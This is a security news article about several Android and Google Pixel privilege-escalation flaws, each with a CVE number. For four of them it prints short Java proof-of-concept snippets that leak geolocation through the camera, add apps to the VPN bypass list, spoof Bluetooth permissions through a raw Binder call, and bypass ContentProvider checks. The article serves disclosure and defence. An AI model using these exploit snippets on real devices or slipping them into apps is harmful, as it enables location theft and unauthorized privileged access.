Saturday, December 7, 2024
HomeAndroidMultiple Flaws With Android & Google Pixel Devices Let Attackers Elevate Privileges

Multiple Flaws With Android & Google Pixel Devices Let Attackers Elevate Privileges

Published on

SIEM as a Service

Several high-severity vulnerabilities have been identified in Android and Google Pixel devices, exposing millions of users to potential security risks.

These flaws, categorized under various CVEs (Common Vulnerabilities and Exposures), range from privilege escalation to data theft and unauthorized access to sensitive features.

While some of these vulnerabilities have been patched, others remain a concern, emphasizing the need for constant vigilance and faster remediation from developers. Let’s explore these vulnerabilities in detail, their CVE identifiers, and the associated risks.

- Advertisement - SIEM as a Service

CVE-2024-0017: Access to User Geolocation Through the Camera

CVE-2024-0017, the Android Camera app allows users to capture images and embed geolocation metadata in the photo’s Exif data.

Leveraging 2024 MITRE ATT&CK Results for SME & MSP Cybersecurity Leaders – Attend Free Webinar

However, a flaw in the logic enables attackers to retrieve geolocation data even if their apps lack the required ACCESS_FINE_LOCATION permission.

The vulnerability lies in the CameraActivity.shouldUseNoOpLocation() method, which determines the handler for geolocation data.

If the Activity.getCallingPackage() method returns null, the system defaults to LegacyLocationProvider, unintentionally exposing the user’s location.

Proof of Concept (PoC)

An attacker can exploit this flaw by creating an app that uses the android.media.action.IMAGE_CAPTURE intent, storing captured content in their own content provider. The geolocation data can then be extracted from the photo’s metadata.

Intent i = new Intent("android.media.action.IMAGE_CAPTURE");
i.setClassName("com.android.camera2", "com.android.camera.CameraActivity");
i.putExtra("output", Uri.parse("content://test.provider/wow"));
startActivity(i);

CVE-2023-21383: Adding Apps to the VPN Bypass List

This vulnerability, CVE-2023-21383 affects the Settings app in Android, which allows unauthorized modification of VPN bypass lists.

By exploiting this issue, an attacker can add system apps like Google Chrome to the VPN exclusion list, potentially exposing sensitive data to unencrypted channels.

Proof of Concept (PoC)

An attacker can declare specific permissions in their app and broadcast an intent to add apps to the VPN bypass list.

Intent i = new Intent("com.google.android.settings.action.UPDATE_PREDEFINED_APP_EXCLUSION_LIST");
i.setClassName("com.android.settings", "com.google.android.settings.vpn2.AppBypassBroadcastReceiver");
i.putExtra("com.google.android.wildlife.extra.UPDATE_PREDEFINED_APP_EXCLUSION_LIST",
    new ArrayList<>(Arrays.asList("com.android.chrome")));
sendBroadcast(i);

CVE-2024-34719: Incorrect Bluetooth Permission Check

CVE-2024-34719, the flaw in the Bluetooth permissions system allows attackers to bypass security checks by manipulating the AttributionSource parameter. This enables unauthorized interaction with Bluetooth APIs, including privileged methods.

Android’s Bluetooth service checks permissions both at the client and system service levels.

By passing a crafted AttributionSource object, attackers can trick the system into granting elevated privileges.

Proof of Concept (PoC)

Using the IBluetooth.setName() method, an attacker can change the device name without proper authorization.

BluetoothAdapter adapter = BluetoothAdapter.getDefaultAdapter();
Field field = BluetoothAdapter.class.getDeclaredField("mService");
field.setAccessible(true);
IBinder binder = ((IInterface) field.get(adapter)).asBinder();
Parcel parcel = Parcel.obtain();
parcel.writeInterfaceToken(binder.getInterfaceDescriptor());
parcel.writeString("Pwned"); // device name
binder.transact(7, parcel, Parcel.obtain(), 0);

CVE-2023-21292: Bypassing Internal Security Checks in ContentProvider

CVE-2023-21292, this vulnerability allows attackers to bypass internal permission checks in the ContentProvider.openFile() method. By proxying the caller’s context, attackers can gain unauthorized access to protected resources.

Proof of Concept (PoC)

The attack exploits the IActivityManager.openContentUri() method, which fails to save the caller’s context properly.

final String uri = "content://victim.test/";
IBinder binder = getService("activity");
Parcel parcel = Parcel.obtain();
parcel.writeInterfaceToken(binder.getInterfaceDescriptor());
parcel.writeString(uri);
binder.transact(42, parcel, Parcel.obtain(), 0); // TRANSACTION_openContentUri

Other Vulnerabilities

CVE-2023-20963: Mismatching Parcel/Unparcel Logic for WorkSource

This flaw allowed attackers to execute arbitrary components on behalf of system apps. It was exploited in the wild by the Pinduoduo app before being patched.

CVE-2021-0600: HTML Injection on Device Admin Request Screen

Attackers could inject malicious HTML elements into the Device Admin request screen using crafted Spanned objects.

According to the Over Secured blog, discovering these vulnerabilities highlights the ongoing challenges in securing complex operating systems like Android.

While Google has patched many of these issues, the delayed response in some cases underscores the need for a more proactive approach to vulnerability management.

For users, keeping devices updated and limiting app permissions are critical steps in mitigating risks.

Meanwhile, developers should integrate robust vulnerability scanning tools into their software development lifecycle (SDLC) to catch issues early and protect end-users from exploitation.

Analyze cyber threats with ANYRUN's powerful sandbox. Black Friday Deals : Get up to 3 Free Licenses.

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

DaMAgeCard Attack – New SD Card Attack Lets Hackers Directly Access System Memory

Security researchers have identified a significant vulnerability dubbed "DaMAgeCard Attack" in the new SD...

Deloitte Denies Breach, Claims Only Single System Affected

Ransomware group Brain Cipher claimed to have breached Deloitte UK and threatened to publish...

Top Five Industries Most Frequently Targeted by Phishing Attacks

Researchers analyzed phishing attacks from Q3 2023 to Q3 2024 and identified the top...

Russian BlueAlpha APT Exploits Cloudflare Tunnels to Distribute Custom Malware

BlueAlpha, a Russian state-sponsored group, is actively targeting Ukrainian individuals and organizations by using...

API Security Webinar

72 Hours to Audit-Ready API Security

APIs present a unique challenge in this landscape, as risk assessment and mitigation are often hindered by incomplete API inventories and insufficient documentation.

Join Vivek Gopalan, VP of Products at Indusface, in this insightful webinar as he unveils a practical framework for discovering, assessing, and addressing open API vulnerabilities within just 72 hours.

Discussion points

API Discovery: Techniques to identify and map your public APIs comprehensively.
Vulnerability Scanning: Best practices for API vulnerability analysis and penetration testing.
Clean Reporting: Steps to generate a clean, audit-ready vulnerability report within 72 hours.

More like this

DaMAgeCard Attack – New SD Card Attack Lets Hackers Directly Access System Memory

Security researchers have identified a significant vulnerability dubbed "DaMAgeCard Attack" in the new SD...

Deloitte Denies Breach, Claims Only Single System Affected

Ransomware group Brain Cipher claimed to have breached Deloitte UK and threatened to publish...

Top Five Industries Most Frequently Targeted by Phishing Attacks

Researchers analyzed phishing attacks from Q3 2023 to Q3 2024 and identified the top...